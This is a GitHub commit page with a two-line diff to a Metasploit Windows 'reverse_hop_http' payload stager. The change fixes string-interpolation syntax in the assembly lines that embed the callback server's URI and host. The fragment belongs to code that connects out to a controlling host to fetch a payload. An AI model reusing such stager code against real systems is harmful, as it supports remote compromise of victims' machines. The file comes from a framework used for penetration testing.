We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 3ef35f1 commit 6f433dbCopy full SHA for 6f433db
modules/payloads/stagers/windows/reverse_hop_http.rb
@@ -234,7 +234,7 @@ def generate
234
call httpopenrequest
235
236
server_uri:
237
- db "#{Rex::Text.hexify(uri.request_uri, 99999).strip)?/12345", 0x00
+ db "#{Rex::Text.hexify(uri.request_uri, 99999).strip}?/12345", 0x00
238
239
failure:
240
push 0x56A2B5F0 ; hardcoded to exitprocess for size
@@ -279,7 +279,7 @@ def generate
279
call internetconnect
280
281
server_host:
282
-db "#{Rex::Text.hexify(uri.host, 99999).strip", 0x00
+db "#{Rex::Text.hexify(uri.host, 99999).strip}", 0x00
283
284
EOS
285
self.module_info['Stager']['Assembly'] = payload_data.to_s
0 commit comments